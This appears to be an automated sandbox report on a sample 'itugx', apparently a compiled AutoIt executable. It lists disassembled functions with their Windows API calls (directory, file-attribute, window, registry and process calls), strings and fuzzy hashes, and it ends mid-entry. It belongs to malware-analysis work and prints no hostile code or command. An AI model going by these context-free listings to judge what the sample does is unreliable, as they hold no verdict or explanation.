                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 37fd3acb2f83a4eb7160affa63eaeb03c55a7e6faeb8ba7ca50e60c433da5657
                                                    • Instruction ID: 17fc261a2703c08a5a4aa74e8a0f73b0d9c38b963ba96bd57654b83482c33fd5
                                                    • Opcode Fuzzy Hash: 37fd3acb2f83a4eb7160affa63eaeb03c55a7e6faeb8ba7ca50e60c433da5657
                                                    • Instruction Fuzzy Hash: 64D15A317012128FCB2BEF14C495EAAF7A4BF09741F15429DE84A6B661DB30ED66CF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2466 38874a-38878c call 3522f0 call 318e70 2471 38878e-38879c call 31c92d 2466->2471 2472 3887a2 2466->2472 2471->2472 2478 38879e-3887a0 2471->2478 2474 3887a4-3887b0 2472->2474 2476 38886d-38891f call 318e70 call 31557e call 33d913 call 3393c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2474->2476 2477 3887b6 2474->2477 2511 388921-38892d call 37e387 2476->2511 2512 388973-388984 call 31e650 2476->2512 2480 3887ba-3887c0 2477->2480 2478->2474 2482 3887ca-3887cf 2480->2482 2483 3887c2-3887c8 2480->2483 2486 3887d9-3887df 2482->2486 2487 3887d1-3887d4 2482->2487 2485 3887d6 2483->2485 2485->2486 2488 388848-38884a 2486->2488 2489 3887e1-3887e4 2486->2489 2487->2485 2492 38884b-38884e 2488->2492 2489->2488 2491 3887e6-3887e9 2489->2491 2495 3887eb-3887ee 2491->2495 2496 388844-388846 2491->2496 2497 388858 2492->2497 2498 388850-388856 2492->2498 2495->2496 2500 3887f0-3887f3 2495->2500 2501 38883d-38883e 2496->2501 2502 38885c-388867 2497->2502 2498->2502 2504 388840-388842 2500->2504 2505 3887f5-3887f8 2500->2505 2501->2492 2502->2476 2502->2480 2504->2501 2505->2504 2507 3887fa-3887fd 2505->2507 2509 38883b 2507->2509 2510 3887ff-388802 2507->2510 2509->2501 2510->2509 2513 388804-388807 2510->2513 2511->2512 2522 38892f-38893a call 37e9c5 2511->2522 2521 388987-38898b call 31bd2c 2512->2521 2515 388809-38880c 2513->2515 2516 388834-388839 2513->2516 2515->2516 2519 38880e-388811 2515->2519 2516->2492 2523 38882d-388832 2519->2523 2524 388813-388816 2519->2524 2528 388990-388998 2521->2528 2532 3889cf 2522->2532 2533 388940-388967 GetFileAttributesW SetFileAttributesW 2522->2533 2523->2492 2524->2523 2527 388818-38881b 2524->2527 2530 38881d-388820 2527->2530 2531 388826-38882b 2527->2531 2530->2531 2534 38899b-3889af call 31e650 2530->2534 2531->2492 2536 3889d3-3889ec call 389f9f 2532->2536 2537 388969-388971 SetCurrentDirectoryW 2533->2537 2538 3889b1-3889b3 2533->2538 2534->2528 2540 388a02-388a0c SetCurrentDirectoryW 2536->2540 2546 3889ee-3889fb call 31e650 2536->2546 2537->2512 2538->2540 2541 3889b5-3889cd SetCurrentDirectoryW call 334d13 2538->2541 2540->2521 2541->2536 2546->2540
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00388907
                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0038891B
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00388945
                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0038895F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388971
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003889BA
                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00388A0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile
                                                    • String ID: *.*
                                                    • API String ID: 769691225-438819550
                                                    • Opcode ID: 315c18c6fb7ee2d1dbbde4a66b709ef40d6dbc41242aeb82259d2998b0627e73
                                                    • Instruction ID: 0448a3746c0d9bb82c639f8830b878db9f8c60e7af937115635b595e58989756
                                                    • Opcode Fuzzy Hash: 315c18c6fb7ee2d1dbbde4a66b709ef40d6dbc41242aeb82259d2998b0627e73
                                                    • Instruction Fuzzy Hash: 6081D3725043019FCB26FF24C484AAEB3E9BF89310F95485EF889DB251DB35D945CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003490D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0aa46a9570d1e562ce8410986cc2a46d054d491ae2cfbeaf23b3fec67d202ce6
                                                    • Instruction ID: 7fafe4539c305c809f65404e1fe037bfceed794f17ab9b9b1e57136b4cbee641
                                                    • Opcode Fuzzy Hash: 0aa46a9570d1e562ce8410986cc2a46d054d491ae2cfbeaf23b3fec67d202ce6
                                                    • Instruction Fuzzy Hash: 1CC1B574E042499FDF13DFA9C885BAEBBF4AF0A310F15415AE514AF392C734A942CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 00313568
                                                    • CreateWindowExW.USER32 ref: 00313589
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 0031359D
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 003135A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 7a8fc8af6a72300bbf71b15e83975db83c0950b6845b5c85f59d813f181acff3
                                                    • Instruction ID: 0b82f1734533e212d6811a7f6b74a27bc27e2eefe37a3b16345ae6e5939f24af
                                                    • Opcode Fuzzy Hash: 7a8fc8af6a72300bbf71b15e83975db83c0950b6845b5c85f59d813f181acff3
                                                    • Instruction Fuzzy Hash: 46F03A786402D47AEB370B136C88E772EBDD7C7F10F00011EB904AB5E0D2690841DEB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003155F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031561C
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031563D
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031565F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 89b08109f7ce0c8b0f0c658888c4a4f7e722155977876f84091c8c09cbd76776
                                                    • Instruction ID: 980c4b6c118bb1a75af15698b707ba0bc685d0b7401855c50f8685ef98313972
                                                    • Opcode Fuzzy Hash: 89b08109f7ce0c8b0f0c658888c4a4f7e722155977876f84091c8c09cbd76776
                                                    • Instruction Fuzzy Hash: FF1148B1611608FFDB268F64C840DEEB7ACEF49744F405469B805D7120E6719E8097A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037DA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,003ADC30), ref: 0037DABB
                                                    • GetLastError.KERNEL32 ref: 0037DACA
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0037DAD9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003ADC30), ref: 0037DB36
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 89b0c5c7f871b53feda286db1f50e6aab787031858f6917155c0807399ff7f03
                                                    • Instruction ID: a3e42fe44b18bcff12002deb4e365ef8eaef8a68d2d8742c6bf4b8c9e0e1a6cd
                                                    • Opcode Fuzzy Hash: 89b0c5c7f871b53feda286db1f50e6aab787031858f6917155c0807399ff7f03
                                                    • Instruction Fuzzy Hash: A321A3305082059FC715DF24D8818ABB7F8EE5A364F158A1DF49EC72A1D734DD4ACB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00313A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00354115
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                      • Part of subcall function 003139DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003139FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen
                                                    • String ID: X$`u=
                                                    • API String ID: 779396738-2749776380
                                                    • Opcode ID: a11b9feb7dc6a91b9b1045bb73bf0be326b5571f730e97a33118031ede3b79e0
                                                    • Instruction ID: 3e3e6eae3a986e1989257a58fb920eeb0b25e6860c6afd308b3c235ff6e9cb77
                                                    • Opcode Fuzzy Hash: a11b9feb7dc6a91b9b1045bb73bf0be326b5571f730e97a33118031ede3b79e0
                                                    • Instruction Fuzzy Hash: 5321D571A042589BCB57DF98D805BEE7BFD9F49304F00401AE405AB381DBF45AC98FA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0033016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003309F8
                                                      • Part of subcall function 00333634: RaiseException.KERNEL32(?,?,?,00330A1A,?,00000000,?,?,?,?,?,?,00330A1A,00000000,003D9758,00000000), ref: 00333694
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00330A15
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    • Opcode ID: b8023ed7360aad053e5d38f249c9eb6c3d19bd70417a75673f7c9d9234cbe9ba
                                                    • Instruction ID: c8af9a51af7bf3478500473aeb594c9c80c41f42cfdcdb87dfdf02ebb385c9f0
                                                    • Opcode Fuzzy Hash: b8023ed7360aad053e5d38f249c9eb6c3d19bd70417a75673f7c9d9234cbe9ba
                                                    • Instruction Fuzzy Hash: 4BF0683490020D778B0BBAA4E8E6A9E777C5E00750F504125B914995F2EB71DA56C5C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003988B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00398C52
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00398C59
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00398E3A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                    • String ID:
                                                    • API String ID: 146820519-0
                                                    • Opcode ID: 81c344941a102f3e03636507648989020731e8fe7a04605bcb2587b4932906ea
                                                    • Instruction ID: a379c836df0a5fbc47aae1c9dd597fb6ab2c99a5625c0c9b0c1c7ce76de85c9b
                                                    • Opcode Fuzzy Hash: 81c344941a102f3e03636507648989020731e8fe7a04605bcb2587b4932906ea
                                                    • Instruction Fuzzy Hash: 74127971A083409FCB15DF28C494B6ABBE5FF89314F05895DE8898B292CB31ED45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003999F5 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_strcat
                                                    • String ID:
                                                    • API String ID: 306214811-0
                                                    • Opcode ID: 6b21e02ea35a917fd61118536c3f5f2401bb0e2407e299e92fdaa7bc25c2ea1f
                                                    • Instruction ID: b3bed53d5963484d53184d518bf326451369fbeab4337a9951bfa4d721036fa4
                                                    • Opcode Fuzzy Hash: 6b21e02ea35a917fd61118536c3f5f2401bb0e2407e299e92fdaa7bc25c2ea1f
                                                    • Instruction Fuzzy Hash: 38A16C35600605DFCB19DF58C5D1AA9BBA5FF49314B2084AEE80A8F792DB35ED42CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00316BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00316CA1
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00316CB1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 6fd844e2fcc39701cad5cdcee4ac6f2d0d69879129657887d6dc7b6291519383
                                                    • Instruction ID: fd1a87ae3178a6fa2e9d7bdb8768d581e27364b0b6f1f73aa4e19f955e75befc
                                                    • Opcode Fuzzy Hash: 6fd844e2fcc39701cad5cdcee4ac6f2d0d69879129657887d6dc7b6291519383
                                                    • Instruction Fuzzy Hash: CC318C71A00619EFDB19CFA8C981BD9B7B5FB08714F158629E81597240C771FE94CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0032FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00315F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00316049
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0032FD44
                                                    • SetTimer.USER32 ref: 0032FD53
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0036FDD3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer$Kill
                                                    • String ID:
                                                    • API String ID: 3500052701-0
                                                    • Opcode ID: a9b383063abb636e886d38008d925121d8d8b199092f5726622bd8bace21d78a
                                                    • Instruction ID: 56d43ee3f5219cfd5b6fd205b1c8c0ce07d56063c9dbb3d0503d22e0c8d8f732
                                                    • Opcode Fuzzy Hash: a9b383063abb636e886d38008d925121d8d8b199092f5726622bd8bace21d78a
                                                    • Instruction Fuzzy Hash: 6F31B470904754AFEB23CF249885BE6BBEC9B06308F0044AAE5DA57249C7746A85CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00348A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,0034895C,?,003D9CE8,0000000C), ref: 00348A94
                                                    • GetLastError.KERNEL32(?,0034895C,?,003D9CE8,0000000C), ref: 00348A9E
                                                    • __dosmaperr.LIBCMT ref: 00348AC9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                    • String ID:
                                                    • API String ID: 490808831-0
                                                    • Opcode ID: 4eafcd5e010741145a665eba21d4bd2e5bdd4b46b1a52c2c8be0608f1175cc2a
                                                    • Instruction ID: 4709e1c2ff3fc43641e92c36aee409f21e14a381f40bfe983e9af716b9f6ba19
                                                    • Opcode Fuzzy Hash: 4eafcd5e010741145a665eba21d4bd2e5bdd4b46b1a52c2c8be0608f1175cc2a
                                                    • Instruction Fuzzy Hash: 1F016F32A051605BD6672734588577E27CE4B81734F2F061BF8049F4D3DEA0BCC54290
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0034971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003497CA,FF8BC369,00000000,00000002,00000000), ref: 00349754
                                                    • GetLastError.KERNEL32(?,003497CA,FF8BC369,00000000,00000002,00000000,?,00345EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00336F61), ref: 0034975E
                                                    • __dosmaperr.LIBCMT ref: 00349765
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2336955059-0
                                                    • Opcode ID: efb5632bf8adde026a81950632b353cc46cecc25b55e4d95fb5f9bb08163075f
                                                    • Instruction ID: d3b07f3ea4a3f66a82fcee798fd49dbe3a22a2f61ca21af140aa4d1dcb12c261
                                                    • Opcode Fuzzy Hash: efb5632bf8adde026a81950632b353cc46cecc25b55e4d95fb5f9bb08163075f
                                                    • Instruction Fuzzy Hash: C9012832A20114AFCB079F99DC45DAF7F6EDB85330F24031AF8118F1A1EA30AD418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • TranslateMessage.USER32(?), ref: 0031F22B
                                                    • DispatchMessageW.USER32 ref: 0031F239
                                                    • PeekMessageW.USER32 ref: 0031F24F
                                                    • Sleep.KERNELBASE(0000000A), ref: 0031F261
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 0036327C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                    • String ID:
                                                    • API String ID: 3288985973-0
